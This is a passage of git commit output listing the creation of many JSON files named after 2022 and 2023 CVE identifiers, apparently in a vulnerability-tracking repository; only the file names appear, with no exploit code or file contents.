2022/CVE-2022-25927.json create mode 100644 2022/CVE-2022-25949.json create mode 100644 2022/CVE-2022-2602.json create mode 100644 2022/CVE-2022-26138.json create mode 100644 2022/CVE-2022-26265.json create mode 100644 2022/CVE-2022-26377.json create mode 100644 2022/CVE-2022-2639.json create mode 100644 2022/CVE-2022-26485.json create mode 100644 2022/CVE-2022-26488.json create mode 100644 2022/CVE-2022-26503.json create mode 100644 2022/CVE-2022-26629.json create mode 100644 2022/CVE-2022-26763.json create mode 100644 2022/CVE-2022-26766.json create mode 100644 2022/CVE-2022-26965.json create mode 100644 2022/CVE-2022-27226.json create mode 100644 2022/CVE-2022-27251.json create mode 100644 2022/CVE-2022-27254.json create mode 100644 2022/CVE-2022-27255.json create mode 100644 2022/CVE-2022-27413.json create mode 100644 2022/CVE-2022-27414.json create mode 100644 2022/CVE-2022-27499.json create mode 100644 2022/CVE-2022-27502.json create mode 100644 2022/CVE-2022-27518.json create mode 100644 2022/CVE-2022-27646.json create mode 100644 2022/CVE-2022-27666.json create mode 100644 2022/CVE-2022-27925.json create mode 100644 2022/CVE-2022-27927.json create mode 100644 2022/CVE-2022-27997.json create mode 100644 2022/CVE-2022-28079.json create mode 100644 2022/CVE-2022-28080.json create mode 100644 2022/CVE-2022-28118.json create mode 100644 2022/CVE-2022-28171.json create mode 100644 2022/CVE-2022-28282.json create mode 100644 2022/CVE-2022-28368.json create mode 100644 2022/CVE-2022-28381.json create mode 100644 2022/CVE-2022-28672.json create mode 100644 2022/CVE-2022-2884.json create mode 100644 2022/CVE-2022-29063.json create mode 100644 2022/CVE-2022-29078.json create mode 100644 2022/CVE-2022-29154.json create mode 100644 2022/CVE-2022-29170.json create mode 100644 2022/CVE-2022-29361.json create mode 100644 2022/CVE-2022-29380.json create mode 100644 2022/CVE-2022-29469.json create mode 100644 2022/CVE-2022-29581.json create mode 100644 2022/CVE-2022-29582.json create mode 100644 2022/CVE-2022-29856.json create mode 100644 2022/CVE-2022-2992.json create mode 100644 2022/CVE-2022-30114.json create mode 100644 2022/CVE-2022-30129.json create mode 100644 2022/CVE-2022-30136.json create mode 100644 2022/CVE-2022-30203.json create mode 100644 2022/CVE-2022-30206.json create mode 100644 2022/CVE-2022-30216.json create mode 100644 2022/CVE-2022-30333.json create mode 100644 2022/CVE-2022-30507.json create mode 100644 2022/CVE-2022-30524.json create mode 100644 2022/CVE-2022-30526.json create mode 100644 2022/CVE-2022-30592.json create mode 100644 2022/CVE-2022-30594.json create mode 100644 2022/CVE-2022-30600.json create mode 100644 2022/CVE-2022-30887.json create mode 100644 2022/CVE-2022-30929.json create mode 100644 2022/CVE-2022-31007.json create mode 100644 2022/CVE-2022-31061.json create mode 100644 2022/CVE-2022-31101.json create mode 100644 2022/CVE-2022-31138.json create mode 100644 2022/CVE-2022-31144.json create mode 100644 2022/CVE-2022-31181.json create mode 100644 2022/CVE-2022-31188.json create mode 100644 2022/CVE-2022-31262.json create mode 100644 2022/CVE-2022-31269.json create mode 100644 2022/CVE-2022-31479.json create mode 100644 2022/CVE-2022-31499.json create mode 100644 2022/CVE-2022-31626.json create mode 100644 2022/CVE-2022-31629.json create mode 100644 2022/CVE-2022-3168.json create mode 100644 2022/CVE-2022-31691.json create mode 100644 2022/CVE-2022-31692.json create mode 100644 2022/CVE-2022-31705.json create mode 100644 2022/CVE-2022-3172.json create mode 100644 2022/CVE-2022-31793.json create mode 100644 2022/CVE-2022-31798.json create mode 100644 2022/CVE-2022-31814.json create mode 100644 2022/CVE-2022-31854.json create mode 100644 2022/CVE-2022-31889.json create mode 100644 2022/CVE-2022-31890.json create mode 100644 2022/CVE-2022-31897.json create mode 100644 2022/CVE-2022-31898.json create mode 100644 2022/CVE-2022-31901.json create mode 100644 2022/CVE-2022-31902.json create mode 100644 2022/CVE-2022-32060.json create mode 100644 2022/CVE-2022-32073.json create mode 100644 2022/CVE-2022-32074.json create mode 100644 2022/CVE-2022-32132.json create mode 100644 2022/CVE-2022-32199.json create mode 100644 2022/CVE-2022-32206.json create mode 100644 2022/CVE-2022-32223.json create mode 100644 2022/CVE-2022-32224.json create mode 100644 2022/CVE-2022-32250.json create mode 100644 2022/CVE-2022-32548.json create mode 100644 2022/CVE-2022-32832.json create mode 100644 2022/CVE-2022-32862.json create mode 100644 2022/CVE-2022-32883.json create mode 100644 2022/CVE-2022-32898.json create mode 100644 2022/CVE-2022-32932.json create mode 100644 2022/CVE-2022-32947.json create mode 100644 2022/CVE-2022-32981.json create mode 100644 2022/CVE-2022-33075.json create mode 100644 2022/CVE-2022-33082.json create mode 100644 2022/CVE-2022-3317.json create mode 100644 2022/CVE-2022-33174.json create mode 100644 2022/CVE-2022-3328.json create mode 100644 2022/CVE-2022-3357.json create mode 100644 2022/CVE-2022-33679.json create mode 100644 2022/CVE-2022-3368.json create mode 100644 2022/CVE-2022-33891.json create mode 100644 2022/CVE-2022-33980.json create mode 100644 2022/CVE-2022-34169.json create mode 100644 2022/CVE-2022-34265.json create mode 100644 2022/CVE-2022-34527.json create mode 100644 2022/CVE-2022-34556.json create mode 100644 2022/CVE-2022-3464.json create mode 100644 2022/CVE-2022-34683.json create mode 100644 2022/CVE-2022-34715.json create mode 100644 2022/CVE-2022-34718.json create mode 100644 2022/CVE-2022-34753.json create mode 100644 2022/CVE-2022-34913.json create mode 100644 2022/CVE-2022-34918.json create mode 100644 2022/CVE-2022-34919.json create mode 100644 2022/CVE-2022-34970.json create mode 100644 2022/CVE-2022-35131.json create mode 100644 2022/CVE-2022-3518.json create mode 100644 2022/CVE-2022-35405.json create mode 100644 2022/CVE-2022-35411.json create mode 100644 2022/CVE-2022-35416.json create mode 100644 2022/CVE-2022-3546.json create mode 100644 2022/CVE-2022-35500.json create mode 100644 2022/CVE-2022-35501.json create mode 100644 2022/CVE-2022-35513.json create mode 100644 2022/CVE-2022-3552.json create mode 100644 2022/CVE-2022-3564.json create mode 100644 2022/CVE-2022-35649.json create mode 100644 2022/CVE-2022-35698.json create mode 100644 2022/CVE-2022-35737.json create mode 100644 2022/CVE-2022-35841.json create mode 100644 2022/CVE-2022-35899.json create mode 100644 2022/CVE-2022-3590.json create mode 100644 2022/CVE-2022-35914.json create mode 100644 2022/CVE-2022-35919.json create mode 100644 2022/CVE-2022-3602.json create mode 100644 2022/CVE-2022-36067.json create mode 100644 2022/CVE-2022-36162.json create mode 100644 2022/CVE-2022-36163.json create mode 100644 2022/CVE-2022-36193.json create mode 100644 2022/CVE-2022-36200.json create mode 100644 2022/CVE-2022-36231.json create mode 100644 2022/CVE-2022-36234.json create mode 100644 2022/CVE-2022-36267.json create mode 100644 2022/CVE-2022-36271.json create mode 100644 2022/CVE-2022-36432.json create mode 100644 2022/CVE-2022-36433.json create mode 100644 2022/CVE-2022-36446.json create mode 100644 2022/CVE-2022-36532.json create mode 100644 2022/CVE-2022-36537.json create mode 100644 2022/CVE-2022-36539.json create mode 100644 2022/CVE-2022-36553.json create mode 100644 2022/CVE-2022-3656.json create mode 100644 2022/CVE-2022-36663.json create mode 100644 2022/CVE-2022-36752.json create mode 100644 2022/CVE-2022-36779.json create mode 100644 2022/CVE-2022-36804.json create mode 100644 2022/CVE-2022-36944.json create mode 100644 2022/CVE-2022-36946.json create mode 100644 2022/CVE-2022-3699.json create mode 100644 2022/CVE-2022-37017.json create mode 100644 2022/CVE-2022-37032.json create mode 100644 2022/CVE-2022-37042.json create mode 100644 2022/CVE-2022-37177.json create mode 100644 2022/CVE-2022-37201.json create mode 100644 2022/CVE-2022-37202.json create mode 100644 2022/CVE-2022-37203.json create mode 100644 2022/CVE-2022-37204.json create mode 100644 2022/CVE-2022-37205.json create mode 100644 2022/CVE-2022-37206.json create mode 100644 2022/CVE-2022-37207.json create mode 100644 2022/CVE-2022-37208.json create mode 100644 2022/CVE-2022-37209.json create mode 100644 2022/CVE-2022-37210.json create mode 100644 2022/CVE-2022-37298.json create mode 100644 2022/CVE-2022-37332.json create mode 100644 2022/CVE-2022-37434.json create mode 100644 2022/CVE-2022-37703.json create mode 100644 2022/CVE-2022-37704.json create mode 100644 2022/CVE-2022-37705.json create mode 100644 2022/CVE-2022-37706.json create mode 100644 2022/CVE-2022-37708.json create mode 100644 2022/CVE-2022-3786.json create mode 100644 2022/CVE-2022-37969.json create mode 100644 2022/CVE-2022-38029.json create mode 100644 2022/CVE-2022-38181.json create mode 100644 2022/CVE-2022-38374.json create mode 100644 2022/CVE-2022-38553.json create mode 100644 2022/CVE-2022-38577.json create mode 100644 2022/CVE-2022-38601.json create mode 100644 2022/CVE-2022-38604.json create mode 100644 2022/CVE-2022-38691.json create mode 100644 2022/CVE-2022-38694.json create mode 100644 2022/CVE-2022-38725.json create mode 100644 2022/CVE-2022-38766.json create mode 100644 2022/CVE-2022-38789.json create mode 100644 2022/CVE-2022-38813.json create mode 100644 2022/CVE-2022-3904.json create mode 100644 2022/CVE-2022-39066.json create mode 100644 2022/CVE-2022-39073.json create mode 100644 2022/CVE-2022-3910.json create mode 100644 2022/CVE-2022-39196.json create mode 100644 2022/CVE-2022-39197.json create mode 100644 2022/CVE-2022-39227.json create mode 100644 2022/CVE-2022-39253.json create mode 100644 2022/CVE-2022-39275.json create mode 100644 2022/CVE-2022-39299.json create mode 100644 2022/CVE-2022-3942.json create mode 100644 2022/CVE-2022-39425.json create mode 100644 2022/CVE-2022-3949.json create mode 100644 2022/CVE-2022-39802.json create mode 100644 2022/CVE-2022-39838.json create mode 100644 2022/CVE-2022-39841.json create mode 100644 2022/CVE-2022-3992.json create mode 100644 2022/CVE-2022-39952.json create mode 100644 2022/CVE-2022-39959.json create mode 100644 2022/CVE-2022-39986.json create mode 100644 2022/CVE-2022-39987.json create mode 100644 2022/CVE-2022-40032.json create mode 100644 2022/CVE-2022-40126.json create mode 100644 2022/CVE-2022-40127.json create mode 100644 2022/CVE-2022-40140.json create mode 100644 2022/CVE-2022-40146.json create mode 100644 2022/CVE-2022-40297.json create mode 100644 2022/CVE-2022-40317.json create mode 100644 2022/CVE-2022-40347.json create mode 100644 2022/CVE-2022-40348.json create mode 100644 2022/CVE-2022-40363.json create mode 100644 2022/CVE-2022-4047.json create mode 100644 2022/CVE-2022-40470.json create mode 100644 2022/CVE-2022-40471.json create mode 100644 2022/CVE-2022-40490.json create mode 100644 2022/CVE-2022-40494.json create mode 100644 2022/CVE-2022-4060.json create mode 100644 2022/CVE-2022-4061.json create mode 100644 2022/CVE-2022-40624.json create mode 100644 2022/CVE-2022-4063.json create mode 100644 2022/CVE-2022-40634.json create mode 100644 2022/CVE-2022-40635.json create mode 100644 2022/CVE-2022-40684.json create mode 100644 2022/CVE-2022-40687.json create mode 100644 2022/CVE-2022-40769.json create mode 100644 2022/CVE-2022-40799.json create mode 100644 2022/CVE-2022-40881.json create mode 100644 2022/CVE-2022-40916.json create mode 100644 2022/CVE-2022-4096.json create mode 100644 2022/CVE-2022-41034.json create mode 100644 2022/CVE-2022-41040.json create mode 100644 2022/CVE-2022-41080.json create mode 100644 2022/CVE-2022-41082.json create mode 100644 2022/CVE-2022-41099.json create mode 100644 2022/CVE-2022-41114.json create mode 100644 2022/CVE-2022-41218.json create mode 100644 2022/CVE-2022-41220.json create mode 100644 2022/CVE-2022-41272.json create mode 100644 2022/CVE-2022-41333.json create mode 100644 2022/CVE-2022-41343.json create mode 100644 2022/CVE-2022-41352.json create mode 100644 2022/CVE-2022-41358.json create mode 100644 2022/CVE-2022-41401.json create mode 100644 2022/CVE-2022-41412.json create mode 100644 2022/CVE-2022-41413.json create mode 100644 2022/CVE-2022-41445.json create mode 100644 2022/CVE-2022-41446.json create mode 100644 2022/CVE-2022-41544.json create mode 100644 2022/CVE-2022-41622.json create mode 100644 2022/CVE-2022-41678.json create mode 100644 2022/CVE-2022-41717.json create mode 100644 2022/CVE-2022-41741.json create mode 100644 2022/CVE-2022-41828.json create mode 100644 2022/CVE-2022-41852.json create mode 100644 2022/CVE-2022-41853.json create mode 100644 2022/CVE-2022-41876.json create mode 100644 2022/CVE-2022-41903.json create mode 100644 2022/CVE-2022-41923.json create mode 100644 2022/CVE-2022-41924.json create mode 100644 2022/CVE-2022-41966.json create mode 100644 2022/CVE-2022-42045.json create mode 100644 2022/CVE-2022-42046.json create mode 100644 2022/CVE-2022-42094.json create mode 100644 2022/CVE-2022-42095.json create mode 100644 2022/CVE-2022-42096.json create mode 100644 2022/CVE-2022-42097.json create mode 100644 2022/CVE-2022-42098.json create mode 100644 2022/CVE-2022-42176.json create mode 100644 2022/CVE-2022-42475.json create mode 100644 2022/CVE-2022-4262.json create mode 100644 2022/CVE-2022-42703.json create mode 100644 2022/CVE-2022-42864.json create mode 100644 2022/CVE-2022-42889.json create mode 100644 2022/CVE-2022-42896.json create mode 100644 2022/CVE-2022-42899.json create mode 100644 2022/CVE-2022-4304.json create mode 100644 2022/CVE-2022-43096.json create mode 100644 2022/CVE-2022-43097.json create mode 100644 2022/CVE-2022-43117.json create mode 100644 2022/CVE-2022-43143.json create mode 100644 2022/CVE-2022-43144.json create mode 100644 2022/CVE-2022-43271.json create mode 100644 2022/CVE-2022-43293.json create mode 100644 2022/CVE-2022-43332.json create mode 100644 2022/CVE-2022-43343.json create mode 100644 2022/CVE-2022-43369.json create mode 100644 2022/CVE-2022-43571.json create mode 100644 2022/CVE-2022-43680.json create mode 100644 2022/CVE-2022-43704.json create mode 100644 2022/CVE-2022-4395.json create mode 100644 2022/CVE-2022-43959.json create mode 100644 2022/CVE-2022-43980.json create mode 100644 2022/CVE-2022-44118.json create mode 100644 2022/CVE-2022-44136.json create mode 100644 2022/CVE-2022-44149.json create mode 100644 2022/CVE-2022-44183.json create mode 100644 2022/CVE-2022-44215.json create mode 100644 2022/CVE-2022-44268.json create mode 100644 2022/CVE-2022-44276.json create mode 100644 2022/CVE-2022-44311.json create mode 100644 2022/CVE-2022-44312.json create mode 100644 2022/CVE-2022-44318.json create mode 100644 2022/CVE-2022-44569.json create mode 100644 2022/CVE-2022-44666.json create mode 100644 2022/CVE-2022-44721.json create mode 100644 2022/CVE-2022-44789.json create mode 100644 2022/CVE-2022-44830.json create mode 100644 2022/CVE-2022-44870.json create mode 100644 2022/CVE-2022-44875.json create mode 100644 2022/CVE-2022-44877.json create mode 100644 2022/CVE-2022-44900.json create mode 100644 2022/CVE-2022-45003.json create mode 100644 2022/CVE-2022-45004.json create mode 100644 2022/CVE-2022-45025.json create mode 100644 2022/CVE-2022-45047.json create mode 100644 2022/CVE-2022-45059.json create mode 100644 2022/CVE-2022-4510.json create mode 100644 2022/CVE-2022-45217.json create mode 100644 2022/CVE-2022-45265.json create mode 100644 2022/CVE-2022-45299.json create mode 100644 2022/CVE-2022-45354.json create mode 100644 2022/CVE-2022-4539.json create mode 100644 2022/CVE-2022-4543.json create mode 100644 2022/CVE-2022-45436.json create mode 100644 2022/CVE-2022-45451.json create mode 100644 2022/CVE-2022-45472.json create mode 100644 2022/CVE-2022-45477.json create mode 100644 2022/CVE-2022-45511.json create mode 100644 2022/CVE-2022-45544.json create mode 100644 2022/CVE-2022-45599.json create mode 100644 2022/CVE-2022-45600.json create mode 100644 2022/CVE-2022-45688.json create mode 100644 2022/CVE-2022-45701.json create mode 100644 2022/CVE-2022-45728.json create mode 100644 2022/CVE-2022-45729.json create mode 100644 2022/CVE-2022-45770.json create mode 100644 2022/CVE-2022-45771.json create mode 100644 2022/CVE-2022-45808.json create mode 100644 2022/CVE-2022-45934.json create mode 100644 2022/CVE-2022-45988.json create mode 100644 2022/CVE-2022-46080.json create mode 100644 2022/CVE-2022-46087.json create mode 100644 2022/CVE-2022-46104.json create mode 100644 2022/CVE-2022-4611.json create mode 100644 2022/CVE-2022-4616.json create mode 100644 2022/CVE-2022-46164.json create mode 100644 2022/CVE-2022-46166.json create mode 100644 2022/CVE-2022-46169.json create mode 100644 2022/CVE-2022-46175.json create mode 100644 2022/CVE-2022-46196.json create mode 100644 2022/CVE-2022-46381.json create mode 100644 2022/CVE-2022-46395.json create mode 100644 2022/CVE-2022-46463.json create mode 100644 2022/CVE-2022-46484.json create mode 100644 2022/CVE-2022-46485.json create mode 100644 2022/CVE-2022-46505.json create mode 100644 2022/CVE-2022-46604.json create mode 100644 2022/CVE-2022-46622.json create mode 100644 2022/CVE-2022-46623.json create mode 100644 2022/CVE-2022-46689.json create mode 100644 2022/CVE-2022-46718.json create mode 100644 2022/CVE-2022-46836.json create mode 100644 2022/CVE-2022-47102.json create mode 100644 2022/CVE-2022-47130.json create mode 100644 2022/CVE-2022-47131.json create mode 100644 2022/CVE-2022-47132.json create mode 100644 2022/CVE-2022-47197.json create mode 100644 2022/CVE-2022-47373.json create mode 100644 2022/CVE-2022-47529.json create mode 100644 2022/CVE-2022-47615.json create mode 100644 2022/CVE-2022-47872.json create mode 100644 2022/CVE-2022-47909.json create mode 100644 2022/CVE-2022-47952.json create mode 100644 2022/CVE-2022-47966.json create mode 100644 2022/CVE-2022-47986.json create mode 100644 2022/CVE-2022-48150.json create mode 100644 2022/CVE-2022-48194.json create mode 100644 2022/CVE-2022-48197.json create mode 100644 2022/CVE-2022-48311.json create mode 100644 2022/CVE-2022-48429.json create mode 100644 2022/CVE-2022-48474.json create mode 100644 2022/CVE-2022-48565.json create mode 100644 2022/CVE-2022-4896.json create mode 100644 2022/CVE-2022-4939.json create mode 100644 2022/CVE-2022-4944.json create mode 100644 2023/CVE-2023-0045.json create mode 100644 2023/CVE-2023-0099.json create mode 100644 2023/CVE-2023-0156.json create mode 100644 2023/CVE-2023-0157.json create mode 100644 2023/CVE-2023-0159.json create mode 100644 2023/CVE-2023-0179.json create mode 100644 2023/CVE-2023-0264.json create mode 100644 2023/CVE-2023-0266.json create mode 100644 2023/CVE-2023-0297.json create mode 100644 2023/CVE-2023-0315.json create mode 100644 2023/CVE-2023-0386.json create mode 100644 2023/CVE-2023-0400.json create mode 100644 2023/CVE-2023-0461.json create mode 100644 2023/CVE-2023-0464.json create mode 100644 2023/CVE-2023-0630.json create mode 100644 2023/CVE-2023-0656.json create mode 100644 2023/CVE-2023-0669.json create mode 100644 2023/CVE-2023-0748.json create mode 100644 2023/CVE-2023-08.json create mode 100644 2023/CVE-2023-0830.json create mode 100644 2023/CVE-2023-0860.json create mode 100644 2023/CVE-2023-0861.json create mode 100644 2023/CVE-2023-1112.json create mode 100644 2023/CVE-2023-1177.json create mode 100644 2023/CVE-2023-1326.json create mode 100644 2023/CVE-2023-1337.json create mode 100644 2023/CVE-2023-1389.json create mode 100644 2023/CVE-2023-1415.json create mode 100644 2023/CVE-2023-1430.json create mode 100644 2023/CVE-2023-1454.json create mode 100644 2023/CVE-2023-1488.json create mode 100644 2023/CVE-2023-1498.json create mode 100644 2023/CVE-2023-1665.json create mode 100644 2023/CVE-2023-1671.json create mode 100644 2023/CVE-2023-1698.json create mode 100644 2023/CVE-2023-1718.json create mode 100644 2023/CVE-2023-1767.json create mode 100644 2023/CVE-2023-1773.json create mode 100644 2023/CVE-2023-1829.json create mode 100644 2023/CVE-2023-1874.json create mode 100644 2023/CVE-2023-1999.json create mode 100644 2023/CVE-2023-2002.json create mode 100644 2023/CVE-2023-20025.json create mode 100644 2023/CVE-2023-20048.json create mode 100644 2023/CVE-2023-20052.json create mode 100644 2023/CVE-2023-20073.json create mode 100644 2023/CVE-2023-2008.json create mode 100644 2023/CVE-2023-20110.json create mode 100644 2023/CVE-2023-20126.json create mode 100644 2023/CVE-2023-20178.json create mode 100644 2023/CVE-2023-20198.json create mode 100644 2023/CVE-2023-20209.json create mode 100644 2023/CVE-2023-2023.json create mode 100644 2023/CVE-2023-2024.json create mode 100644 2023/CVE-2023-20273.json create mode 100644 2023/CVE-2023-2033.json create mode 100644 2023/CVE-2023-20562.json create mode 100644 2023/CVE-2023-20573.json create mode 100644 2023/CVE-2023-20593.json create mode 100644 2023/CVE-2023-20598.json create mode 100644 2023/CVE-2023-20860.json create mode 100644 2023/CVE-2023-20872.json create mode 100644 2023/CVE-2023-20887.json create mode 100644 2023/CVE-2023-20909.json create mode 100644 2023/CVE-2023-20911.json create mode 100644 2023/CVE-2023-20918.json create mode 100644 2023/CVE-2023-20921.json create mode 100644 2023/CVE-2023-20933.json create mode 100644 2023/CVE-2023-20943.json create mode 100644 2023/CVE-2023-20944.json create mode 100644 2023/CVE-2023-20945.json create mode 100644 2023/CVE-2023-20955.json create mode 100644 2023/CVE-2023-20963.json create mode 100644 2023/CVE-2023-21036.json create mode 100644 2023/CVE-2023-21086.json create mode 100644 2023/CVE-2023-21094.json create mode 100644 2023/CVE-2023-21097.json create mode 100644 2023/CVE-2023-21109.json create mode 100644 2023/CVE-2023-21118.json create mode 100644 2023/CVE-2023-2114.json create mode 100644 2023/CVE-2023-21144.json create mode 100644 2023/CVE-2023-2123.json create mode 100644 2023/CVE-2023-21238.json create mode 100644 2023/CVE-2023-21246.json create mode 100644 2023/CVE-2023-21251.json create mode 100644 2023/CVE-2023-21272.json create mode 100644 2023/CVE-2023-21275.json create mode 100644 2023/CVE-2023-21281.json create mode 100644 2023/CVE-2023-21282.json create mode 100644 2023/CVE-2023-21284.json create mode 100644 2023/CVE-2023-21285.json create mode 100644 2023/CVE-2023-21286.json create mode 100644 2023/CVE-2023-21288.json create mode 100644 2023/CVE-2023-21537.json create mode 100644 2023/CVE-2023-21554.json create mode 100644 2023/CVE-2023-21560.json create mode 100644 2023/CVE-2023-21608.json create mode 100644 2023/CVE-2023-2163.json create mode 100644 2023/CVE-2023-21674.json create mode 100644 2023/CVE-2023-21707.json create mode 100644 2023/CVE-2023-21716.json create mode 100644 2023/CVE-2023-21739.json create mode 100644 2023/CVE-2023-21742.json create mode 100644 2023/CVE-2023-21746.json create mode 100644 2023/CVE-2023-21752.json create mode 100644 2023/CVE-2023-21766.json create mode 100644 2023/CVE-2023-21768.json create mode 100644 2023/CVE-2023-21823.json create mode 100644 2023/CVE-2023-21837.json create mode 100644 2023/CVE-2023-21839.json create mode 100644 2023/CVE-2023-21887.json create mode 100644 2023/CVE-2023-21931.json create mode 100644 2023/CVE-2023-21939.json create mode 100644 2023/CVE-2023-21971.json create mode 100644 2023/CVE-2023-21987.json create mode 100644 2023/CVE-2023-22074.json create mode 100644 2023/CVE-2023-22098.json create mode 100644 2023/CVE-2023-2215.json create mode 100644 2023/CVE-2023-22432.json create mode 100644 2023/CVE-2023-2249.json create mode 100644 2023/CVE-2023-22490.json create mode 100644 2023/CVE-2023-22515.json create mode 100644 2023/CVE-2023-22518.json create mode 100644 2023/CVE-2023-22524.json create mode 100644 2023/CVE-2023-22527.json create mode 100644 2023/CVE-2023-2255.json create mode 100644 2023/CVE-2023-22551.json create mode 100644 2023/CVE-2023-22621.json create mode 100644 2023/CVE-2023-22622.json create mode 100644 2023/CVE-2023-22726.json create mode 100644 2023/CVE-2023-22809.json create mode 100644 2023/CVE-2023-22855.json create mode 100644 2023/CVE-2023-22884.json create mode 100644 2023/CVE-2023-22894.json create mode 100644 2023/CVE-2023-22906.json create mode 100644 2023/CVE-2023-22941.json create mode 100644 2023/CVE-2023-22960.json create mode 100644 2023/CVE-2023-22974.json create mode 100644 2023/CVE-2023-23138.json create mode 100644 2023/CVE-2023-23169.json create mode 100644 2023/CVE-2023-23192.json create mode 100644 2023/CVE-2023-23279.json create mode 100644 2023/CVE-2023-23333.json create mode 100644 2023/CVE-2023-23388.json create mode 100644 2023/CVE-2023-23396.json create mode 100644 2023/CVE-2023-23397.json create mode 100644 2023/CVE-2023-23488.json create mode 100644 2023/CVE-2023-23531.json create mode 100644 2023/CVE-2023-23583.json create mode 100644 2023/CVE-2023-23607.json create mode 100644 2023/CVE-2023-23638.json create mode 100644 2023/CVE-2023-2375.json create mode 100644 2023/CVE-2023-23752.json create mode 100644 2023/CVE-2023-23924.json create mode 100644 2023/CVE-2023-23946.json create mode 100644 2023/CVE-2023-24044.json create mode 100644 2023/CVE-2023-24055.json create mode 100644 2023/CVE-2023-24059.json create mode 100644 2023/CVE-2023-24078.json create mode 100644 2023/CVE-2023-24100.json create mode 100644 2023/CVE-2023-24203.json create mode 100644 2023/CVE-2023-24249.json create mode 100644 2023/CVE-2023-24278.json create mode 100644 2023/CVE-2023-24317.json create mode 100644 2023/CVE-2023-24329.json create mode 100644 2023/CVE-2023-2437.json create mode 100644 2023/CVE-2023-24488.json create mode 100644 2023/CVE-2023-24489.json create mode 100644 2023/CVE-2023-24517.json create mode 100644 2023/CVE-2023-24538.json create mode 100644 2023/CVE-2023-24610.json create mode 100644 2023/CVE-2023-24706.json create mode 100644 2023/CVE-2023-24709.json create mode 100644 2023/CVE-2023-24749.json create mode 100644 2023/CVE-2023-24775.json create mode 100644 2023/CVE-2023-24871.json create mode 100644 2023/CVE-2023-24955.json create mode 100644 2023/CVE-2023-24998.json create mode 100644 2023/CVE-2023-25136.json create mode 100644 2023/CVE-2023-25157.json create mode 100644 2023/CVE-2023-2516.json create mode 100644 2023/CVE-2023-25194.json create mode 100644 2023/CVE-2023-25202.json create mode 100644 2023/CVE-2023-25203.json create mode 100644 2023/CVE-2023-2523.json create mode 100644 2023/CVE-2023-25234.json create mode 100644 2023/CVE-2023-25260.json create mode 100644 2023/CVE-2023-25261.json create mode 100644 2023/CVE-2023-25262.json create mode 100644 2023/CVE-2023-25263.json create mode 100644 2023/CVE-2023-25292.json create mode 100644 2023/CVE-2023-25355.json create mode 100644 2023/CVE-2023-25581.json create mode 100644 2023/CVE-2023-25610.json create mode 100644 2023/CVE-2023-25690.json create mode 100644 2023/CVE-2023-25725.json create mode 100644 2023/CVE-2023-2579.json create mode 100644 2023/CVE-2023-25813.json create mode 100644 2023/CVE-2023-2591.json create mode 100644 2023/CVE-2023-2594.json create mode 100644 2023/CVE-2023-25950.json create mode 100644 2023/CVE-2023-2598.json create mode 100644 2023/CVE-2023-2603.json create mode 100644 2023/CVE-2023-26035.json create mode 100644 2023/CVE-2023-26048.json create mode 100644 2023/CVE-2023-26049.json create mode 100644 2023/CVE-2023-26067.json create mode 100644 2023/CVE-2023-26136.json create mode 100644 2023/CVE-2023-26144.json create mode 100644 2023/CVE-2023-26255.json create mode 100644 2023/CVE-2023-26256.json create mode 100644 2023/CVE-2023-26258.json create mode 100644 2023/CVE-2023-26262.json create mode 100644 2023/CVE-2023-26269.json create mode 100644 2023/CVE-2023-2636.json create mode 100644 2023/CVE-2023-26360.json create mode 100644 2023/CVE-2023-2640.json create mode 100644 2023/CVE-2023-2645.json create mode 100644 2023/CVE-2023-26469.json create mode 100644 2023/CVE-2023-2650.json create mode 100644 2023/CVE-2023-26563.json create mode 100644 2023/CVE-2023-26602.json create mode 100644 2023/CVE-2023-26607.json create mode 100644 2023/CVE-2023-26609.json create mode 100644 2023/CVE-2023-26692.json create mode 100644 2023/CVE-2023-26785.json create mode 100644 2023/CVE-2023-26818.json create mode 100644 2023/CVE-2023-26852.json create mode 100644 2023/CVE-2023-26866.json create mode 100644 2023/CVE-2023-26976.json create mode 100644 2023/CVE-2023-26982.json create mode 100644 2023/CVE-2023-26984.json create mode 100644 2023/CVE-2023-27035.json create mode 100644 2023/CVE-2023-27100.json create mode 100644 2023/CVE-2023-27163.json create mode 100644 2023/CVE-2023-27216.json create mode 100644 2023/CVE-2023-2728.json create mode 100644 2023/CVE-2023-2732.json create mode 100644 2023/CVE-2023-27326.json create mode 100644 2023/CVE-2023-27327.json create mode 100644 2023/CVE-2023-27350.json create mode 100644 2023/CVE-2023-27363.json create mode 100644 2023/CVE-2023-27372.json create mode 100644 2023/CVE-2023-2744.json create mode 100644 2023/CVE-2023-27470.json create mode 100644 2023/CVE-2023-27524.json create mode 100644 2023/CVE-2023-27532.json create mode 100644 2023/CVE-2023-27564.json create mode 100644 2023/CVE-2023-27566.json create mode 100644 2023/CVE-2023-27587.json create mode 100644 2023/CVE-2023-27703.json create mode 100644 2023/CVE-2023-27704.json create mode 100644 2023/CVE-2023-27742.json create mode 100644 2023/CVE-2023-27746.json create mode 100644 2023/CVE-2023-27842.json create mode 100644 2023/CVE-2023-27997.json create mode 100644 2023/CVE-2023-28121.json create mode 100644 2023/CVE-2023-28197.json create mode 100644 2023/CVE-2023-28205.json create mode 100644 2023/CVE-2023-28206.json create mode 100644 2023/CVE-2023-28218.json create mode 100644 2023/CVE-2023-2822.json create mode 100644 2023/CVE-2023-28229.json create mode 100644 2023/CVE-2023-28231.json create mode 100644 2023/CVE-2023-28244.json create mode 100644 2023/CVE-2023-2825.json create mode 100644 2023/CVE-2023-28252.json create mode 100644 2023/CVE-2023-28293.json create mode 100644 2023/CVE-2023-28324.json create mode 100644 2023/CVE-2023-28329.json create mode 100644 2023/CVE-2023-2833.json create mode 100644 2023/CVE-2023-28330.json create mode 100644 2023/CVE-2023-28343.json create mode 100644 2023/CVE-2023-28354.json create mode 100644 2023/CVE-2023-28432.json create mode 100644 2023/CVE-2023-28434.json create mode 100644 2023/CVE-2023-28447.json create mode 100644 2023/CVE-2023-28467.json create mode 100644 2023/CVE-2023-28588.json create mode 100644 2023/CVE-2023-2859.json create mode 100644 2023/CVE-2023-2868.json create mode 100644 2023/CVE-2023-28753.json create mode 100644 2023/CVE-2023-2877.json create mode 100644 2023/CVE-2023-28771.json create mode 100644 2023/CVE-2023-28772.json create mode 100644 2023/CVE-2023-28810.json create mode 100644 2023/CVE-2023-29007.json create mode 100644 2023/CVE-2023-29017.json create mode 100644 2023/CVE-2023-29084.json create mode 100644 2023/CVE-2023-2916.json create mode 100644 2023/CVE-2023-2928.json create mode 100644 2023/CVE-2023-29324.json create mode 100644 2023/CVE-2023-29336.json create mode 100644 2023/CVE-2023-29343.json create mode 100644 2023/CVE-2023-29357.json create mode 100644 2023/CVE-2023-29360.json create mode 100644 2023/CVE-2023-29384.json create mode 100644 